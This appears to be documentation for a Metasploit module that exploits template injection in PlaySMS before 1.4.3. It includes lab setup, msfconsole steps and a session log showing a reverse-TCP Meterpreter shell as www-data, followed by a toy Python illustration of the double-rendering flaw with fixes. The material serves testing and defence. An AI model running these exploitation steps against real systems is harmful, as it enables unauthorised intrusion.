## Vulnerable Application

### Description

This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom PHP template system called 'TPL', which is used in the PlaySMS template engine at `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker-supplied username containing a malicious payload is submitted. This malicious payload is then stored in a TPL template which, when rendered a second time, results in code execution. The TPL (https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.

### Setup

Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download).

1. Download the application
2. Extract: `tar -xvf playsms-1.4.2.tar.gz`
3. Move it into the web directory: `mv playsms-1.4.2/web/* /var/www/html/`
4. Make the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
5. Change the owner: `chown -R www-data:www-data /var/www/html/`
6. Set DB creds in the config.php file and dump playsms-1.4.2/db/playsms.sql into your playsms database
7. Now visit: http://localhost/

## Verification Steps

1. Install the application (Tested on HackTheBox Frolic Machine)
2. Start msfconsole
3. Do: `use exploit/multi/http/playsms_template_injection`
4. Do: `set rport <port>`
5. Do: `set rhost <host>`
6. Do: `set targeturi /playsms`
7. Do: `check`

   ```
   [*] 10.10.10.111:9999 - The target appears to be vulnerable.
   ```

8. Do: `set lport <port>`
9. Do: `set lhost <host>`
10. Do: `run`
11. You should get a shell.
## Scenarios

### Playsms on Ubuntu Linux

```
msf5 exploit(multi/http/playsms_template_injection) > options

Module options (exploit/multi/http/playsms_template_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base playsms directory path
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   PlaySMS Before 1.4.3

msf5 exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(multi/http/playsms_template_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[+] X-CSRF-Token for login : c62b21bdb395dca92c18446217e31d7f
[*] Trying to Send Payload in Username Field ......
[+] Payload successfully sent
[*] Cookies here : PHPSESSID=p0jmmf1kpqfhpbpcgpbcfbhpv3;
[*] Sending stage (38288 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:51800) at 2020-04-02 17:30:53 -0500

meterpreter > getuid
Server username: www-data (1000)
meterpreter > sysinfo
Computer     : ec31d13f3520
OS           : Linux ec31d13f3520 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
Meterpreter  : php/linux
meterpreter >
```
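The Description above attributes the bug to "double processing": a template is compiled once with user-controlled data substituted in, and the result is then compiled again, so template syntax that arrived inside data is interpreted on the second pass. The following is an added illustration of that bug class written for this page; it is not PlaySMS or TPL code and does not reproduce TPL's syntax or its PHP evaluation. It uses a toy engine in which `{name}` references are replaced from a context, with `CONTEXT`, `secret`, `escape_template_syntax` and `is_safe_username` all being constructed for the example. The vulnerable path is shown beside two fixes: rendering exactly once, and escaping delimiters in data when a second pass cannot be avoided, plus an allowlist check of the kind a login form should apply to a username before it is ever stored.

```python
import re

# Toy template engine for this illustration only (NOT PlaySMS's TPL engine).
# A reference of the form {name} is replaced with CONTEXT[name]; unknown
# names are left untouched so the literal text survives the pass.
TOKEN = re.compile(r"\{([A-Za-z_][A-Za-z0-9_]*)\}")

# Constructed context: "secret" stands in for any server-side value that
# the template context exposes (config values, other users' data, ...).
CONTEXT = {"secret": "db-password-EXAMPLE"}

PAGE = "Welcome, {username}"   # constructed page template


def render(template: str, ctx: dict) -> str:
    """Single-pass render: substitute each {name} found in `template` from `ctx`.
    re.sub scans the original string only, so substituted values are not re-parsed."""
    return TOKEN.sub(lambda m: str(ctx.get(m.group(1), m.group(0))), template)


def escape_template_syntax(value: str) -> str:
    """Neutralise template delimiters inside DATA so a later pass treats them literally."""
    return value.replace("{", "&#123;").replace("}", "&#125;")


def is_safe_username(value: str) -> bool:
    """Allowlist check for a username: letters, digits, '_', '.', '-' only (1-64 chars).
    Rejecting anything else at input time keeps template or code syntax out of storage."""
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", value) is not None


def vulnerable_render(stored_username: str) -> str:
    """Vulnerable pattern: the page is rendered with the stored username, and the
    output (which now contains user data) is compiled as a template a second time."""
    first_pass = render(PAGE, {**CONTEXT, "username": stored_username})
    return render(first_pass, CONTEXT)   # user data is now treated as template source


def fixed_render_once(stored_username: str) -> str:
    """Fix A: render exactly once. Data substituted in the only pass is never re-compiled."""
    return render(PAGE, {**CONTEXT, "username": stored_username})


def fixed_render_escaped(stored_username: str) -> str:
    """Fix B: if a second pass is unavoidable, escape delimiters in data before the first pass."""
    first_pass = render(PAGE, {**CONTEXT, "username": escape_template_syntax(stored_username)})
    return render(first_pass, CONTEXT)


if __name__ == "__main__":
    # Constructed input: a "username" that is itself a template reference.
    hostile = "{secret}"
    print("allowlist accepts it?", is_safe_username(hostile))     # False
    print("vulnerable  :", vulnerable_render(hostile))            # secret leaks on pass two
    print("render once :", fixed_render_once(hostile))            # braces stay literal
    print("escaped     :", fixed_render_escaped(hostile))         # delimiters neutralised
```

The two fixes address different layers: `fixed_render_once` removes the second compilation, which is the actual root cause, while `escape_template_syntax` and `is_safe_username` are defence in depth for cases where stored data still reaches a template compiler. A review of a template engine should ask the same question this toy makes visible: does any string that originated as user data ever go back into the compile step?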